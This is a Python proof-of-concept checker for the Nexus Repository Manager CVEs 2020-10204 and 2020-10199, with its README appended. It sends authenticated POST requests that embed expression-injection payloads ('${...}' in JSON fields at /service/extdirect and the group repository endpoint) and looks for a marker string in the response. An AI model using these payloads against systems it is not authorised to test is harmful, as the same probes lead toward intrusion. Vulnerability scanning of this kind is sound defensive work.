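#!/usr/bin/env python3
# Nexus-CVE-2020-POC.py
"""Check a Nexus Repository Manager instance for CVE-2020-10204 / CVE-2020-10199.

Each check POSTs one authenticated JSON request whose body carries the
marker string "this is vulnerability" wrapped in an expression, then looks
for that marker in the response text and prints "exists" / "does not exist"
for the CVE.  The session cookie and NX-ANTI-CSRF-TOKEN are supplied by the
operator on the command line; nothing is persisted.

Usage (from the README): python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token

For defenders: both probes are POSTs to /service/extdirect and
/service/rest/beta/repositories/go/group with a "${...}" expression inside a
JSON string field, which is the pattern a WAF/log rule for these CVEs would key on.
"""
import argparse
import json

import requests

# Text the probes plant in the request and then look for in the reply.
MARKER = "this is vulnerability"
# Seconds to wait per request so an unreachable host fails instead of hanging forever.
TIMEOUT = 10


def build_headers(host, origin, cookie, csrf):
    """Return the request headers the script sends with every probe.

    Header names and values are kept exactly as in the original script
    (including the odd-cased "cooKie" key; HTTP header names are
    case-insensitive, so it behaves like "Cookie").
    """
    return {
        "Host": host,
        "Referer": origin,
        "X-Nexus-UI": "true",
        "X-Requested-With": "XMLHttpRequest",
        "NX-ANTI-CSRF-TOKEN": csrf,
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/json",
        "cooKie": cookie,
        "Origin": origin,
        "Connection": "close",
    }


def marker_echoed(url, payload, headers):
    """POST *payload* as JSON to *url*; return True if MARKER appears in the response text.

    Returns None when the request itself fails (connection refused, timeout, ...)
    so the caller can tell "could not test" apart from "not vulnerable" instead
    of dying with a traceback as the original single-shot calls did.
    """
    try:
        response = requests.post(
            url, data=json.dumps(payload), headers=headers, timeout=TIMEOUT
        )
    except requests.RequestException as exc:
        print("[!] request to %s failed: %s" % (url, exc))
        return None
    # NOTE(review): the marker is matched case-sensitively in lowercase, while the
    # expression in the payload would uppercase it if the server evaluated it —
    # confirm which form of the response this comparison is meant to detect.
    return MARKER in response.text


def report(cve, found):
    """Print the per-CVE verdict in the original script's wording.

    *found* is the tri-state result of marker_echoed(): True, False or None.
    """
    if found is None:
        print("[*] %s could not be tested (request failed)." % cve)
    elif found:
        print("[*] %s vulnerability exists." % cve)
    else:
        print("[*] %s vulnerability does not exist." % cve)


def main(argv=None):
    """Parse the command line and run both probes against the given host.

    --ip is required: without it the original built URLs against "None".
    """
    parse = argparse.ArgumentParser()
    parse.add_argument('-i', '--ip', required=True, help='ip')
    parse.add_argument('-p', '--port', default='8081', help='port')
    parse.add_argument('-c', '--cookie', help='HTTP cookie')
    parse.add_argument('-csrf', '--csrf', help='NX-ANTI-CSRF-TOKEN')
    args = parse.parse_args(argv)

    host = "%s:%s" % (args.ip, args.port)
    origin = "http://" + host
    headers = build_headers(host, origin, args.cookie, args.csrf)

    # CVE-2020-10204 POC (request body unchanged from the original script)
    form_data1 = {"action": "coreui_User", "method": "update", "data": [
        {"userId": "test", "version": "1.0", "firstName": "xxx", "lastName": "xxx", "email": "test@qq.com",
         "status": "active", "roles": ["$+{'this is vulnerability'.toUpperCase()}"]}], "type": "rpc", "tid": 7}
    report("CVE-2020-10204",
           marker_echoed(origin + "/service/extdirect", form_data1, headers))

    # CVE-2020-10199 POC (request body unchanged from the original script)
    form_data = {"name": "internal", "online": "true",
                 "storage": {"blobStoreName": "default", "strictContentTypeValidation": "true"},
                 "group": {"memberNames": ["${'this is vulnerability'.toUpperCase()}"]}}
    report("CVE-2020-10199",
           marker_echoed(origin + "/service/rest/beta/repositories/go/group", form_data, headers))


if __name__ == "__main__":
    main()


# --- README.md (reproduced from the repository listing) ---
# # CVE-2020-10199-10204
#
# http://1984-0day.com
#
# ```
# python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token
#
# parse = argparse.ArgumentParser()
# parse.add_argument('-i', '--ip', help='ip')
# parse.add_argument('-p', '--port', default='8081', help='port')
# parse.add_argument('-c', '--cookie', help='HTTP cookie')
# parse.add_argument('-csrf', '--csrf', help='NX-ANTI-CSRF-TOKEN')
# ```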